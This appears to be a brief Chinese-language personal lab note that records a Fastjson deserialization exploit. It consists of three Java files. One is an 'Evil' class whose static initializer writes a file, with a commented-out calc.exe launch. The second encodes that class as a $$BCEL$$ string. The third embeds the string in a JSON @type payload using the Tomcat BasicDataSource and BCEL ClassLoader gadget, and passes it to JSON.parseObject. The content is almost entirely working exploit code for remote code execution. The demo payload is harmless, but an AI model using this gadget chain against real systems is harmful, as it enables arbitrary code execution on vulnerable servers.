只是做个记录
Evil.java
import java.io.File; import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.IOException; public class Evil { // static { // try { // Runtime.getRuntime().exec("calc.exe"); // } catch (Exception e) { // e.printStackTrace(); // } // } static { //win系统 String path = "D:\\hello.txt"; File file = new File(path); String content = "hello,world.\n"; FileOutputStream fileOutputStream = null; try { fileOutputStream = new FileOutputStream(file); } catch (FileNotFoundException e) { e.printStackTrace(); } try { fileOutputStream.write(content.getBytes()); } catch (IOException e) { e.printStackTrace(); } try { fileOutputStream.close(); } catch (IOException e) { e.printStackTrace(); } } }
BCEL.java
import com.sun.org.apache.bcel.internal.Repository; import com.sun.org.apache.bcel.internal.classfile.JavaClass; import com.sun.org.apache.bcel.internal.classfile.Utility; import com.sun.org.apache.bcel.internal.util.ClassLoader; import java.io.IOException; public class BCEL { public static void main(String[] args) throws IOException, ClassNotFoundException, IllegalAccessException, InstantiationException { JavaClass cls = Repository.lookupClass(Evil.class); String code = Utility.encode(cls.getBytes(),true); System.out.println("$$BCEL$$"+code); // 加载类并实例化 new ClassLoader().loadClass("$$BCEL$$"+code).newInstance(); } }
执行BCEL.java
FastjsonTest.java 将上述生成BCEL带入payload
import com.alibaba.fastjson.JSON; public class FastjsonTest { public static void main(String[] args) { String payload = "{\n" + " {\n" + " \"aaa\": {\n" + " \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" + " \"driverClassLoader\": {\n" + " \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" + " },\n" + " \"driverClassName\": \"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$7dS$d9R$TA$U$3dM$s$990$O$86$EQ$W$RQ$96$EB$o$m$88$ac$ca$92r$J$f0$AE$V$85$_$c30$92$c1$c9L$w$e9$m$7c$91$cf$bc$40$95T$f9$B$7e$94xz$40$96B$9d$87$5e$ce$3d$e7$de$db$a7$7b$7e$fe$fa$fe$D$c0K$y$Zh$c6P$iY$j$c3$G$o$c8$c5$91$d7$f1$c2$40$M$p$3aF$N$c41f$907$ae$90$J$j$af$M$98$K$89aR$c7k$jS$C$b1$Z$d7w$e5$9c$40$q$9d$d9$U$d0$W$83$5dG$mQt$7dg$b5$5e$deq$aa$h$d6$8eG$qU$Ml$cb$db$b4$aa$ae$da_$82$9a$y$b95$81$96$a2$j$94$f3$b5z$c5$a9$96$z$3f$bf$7c$e0z$d3$C$f1$Z$db$bb$cc$z$c8$ed$$$ee$5b$HV$de$N$f2$F$d7sV$DY$I$ea$fe$ee$f2$a1$edT$a4$h$f8$U$b4$5e1$de$af$dd$c4$b5$8a$rK$aa$830$ecY$fe$5e$7e$5dV$5d$7fO$c5$3e$bb$aa$91$fb$b7$92$T$d7$ed$c0$97$8e$_$F$9a$Vc$ad$$$xuI$95c$95$F$3an$b1o$c6$a8lZ$97$96$fde$c5$aa$84g$d41Mo$e9$v$ed$a4$7f$C$c6zP$af$daN$n$y$db$a8$8e$9aS$c9L$q$91$S0$97$a6$3e$95$i$cf$Lr$f2$90$b5$cd$9bu$UeF$m$Z$c6$b3$b5$92$V$f8$96$7b$e4$e6$M$81$b6$7f$f5$a34$b3$C$5d$ff$b5$ce$c4$iRl$d4$c4$3c$de$98x$8b$F$5e$c9_$ac4$b1$a8zL$de$b9$y$9atm$ed$da$ce$bec$cb$5b$d0$85$db$bc$a0$f4$dd$xP$8f$s$99$bem$bf$c2$S$V$86e$e8$e5F$d5$b2iV$7c$cf$91$LG$d2$e1$83$d1$d2$99m6$Z$fdZu$r$p$d1$f4$f6$82$d2Dm$_$a89$e8A$82$cfZ$7d$N$Q$caW$8e$z$dc$e59$L$ce$d1$c1S$88$e30$fc$80c$y$E$e3h$e5h$5e$Q$f0$Q$8fB$ac$ed$8fX$8c$f2$f7$88$S$5bN5$7c$3cCd$8b9$b4b$w$ba$oV$cf$Q$db$g$3a$85$be$fa$N$c6$94$d6$ae$9d$a0q8$7b$C$e3$E$f7$ae$90$a6$e1$T$dc$bf$de$j3Y$S$j$e8b$89$5ed$d9$99$89$JLa$96s$ql$aa$c08XX$edL$b6$93$60CI$b4S$f3$98$aa$Ot$a3$93$ca$t$d4$f6P$dd$8d$R$3ce$86$5e$e6$Y$60$96$3e$ded$3f$96$90$J$P$f5$O$3a$Z$d1P$ad$91$a9V$9d$5c$cd_$ad$o$bct$95W$Z0$c9$ac$dd$3ct$C$e3$cc$d9E$93$92$Yc$95gd$3d$t$p$83$d89aMG$af$8e$bep$ec$87$d01$Q$fb$a0$p$j$xp8$a7$a7$ea$T$q$x$97$H$7f$D$5e$f56fq$E$A$A\"\n" + " }\n" + " }:\"xxx\"\n" + "}"; JSON.parseObject(payload); } }